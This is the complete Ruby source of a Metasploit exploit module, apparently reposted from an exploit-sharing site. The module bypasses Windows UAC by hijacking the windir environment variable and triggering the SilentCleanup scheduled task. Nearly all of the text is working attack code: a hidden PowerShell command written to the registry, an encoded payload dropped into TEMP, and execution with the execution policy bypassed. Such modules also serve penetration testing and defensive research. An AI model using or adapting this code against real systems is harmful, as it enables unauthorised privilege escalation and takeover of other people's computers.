Share
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'                 => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',
      'Description'          => %q{
        There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
        When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
        %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.
      },
      'License'              => MSF_LICENSE,
      'Author'               => [
        'tyranid', # Discovery
        'enigma0x3', # Discovery
        'nyshone69', # Discovery
        'Carter Brainerd (cbrnrd)' # Metasploit Module
      ],
      'Platform'             => ['win'],
      'SessionTypes'         => ['meterpreter', 'shell'],
      'Arch'                 => [ARCH_X86, ARCH_X64],
      'Targets'              => [['Microsoft Windows', {}]],
      'DisclosureDate'       => 'Feb 24 2019',
      'References'           => [
        ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],
        ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],
        ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],
        ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']
      ]
    ))

    register_options(
      [
        OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),
        OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"])
      ])
  end

  def get_bypass_script(cmd)
    scr = %Q{
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #{cmd}
      } else {
          $registryPath = "HKCU:\\Environment"
          $Name = "windir"
          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
          Set-ItemProperty -Path $registryPath -Name $name -Value $Value
          #Depending on the performance of the machine, some sleep time may be required before or after schtasks
          Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}
          schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null
          Remove-ItemProperty -Path $registryPath -Name $name
      }
    }
    vprint_status(scr)
    scr
  end

  def exploit
    check_permissions

    e_vars = get_envs('TEMP')
    payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"

    # Write it to disk, run, delete
    upload_payload_ps1(payload_fp)
    vprint_good("Payload uploaded to #{payload_fp}")

    cmd_exec("#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}")
  end

  def check_permissions
    # Check if you are an admin
    case is_in_admin_group?
    when nil
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    when true
      print_good('Part of Administrators group! Continuing...')
    when false
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end

  def upload_payload_ps1(filepath)
    pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
    begin
      vprint_status('Uploading payload PS1...')
      write_file(filepath, get_bypass_script(pld))
      register_file_for_cleanup(filepath)
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")
    end
  end
end

#  0day.today [2019-07-02]  #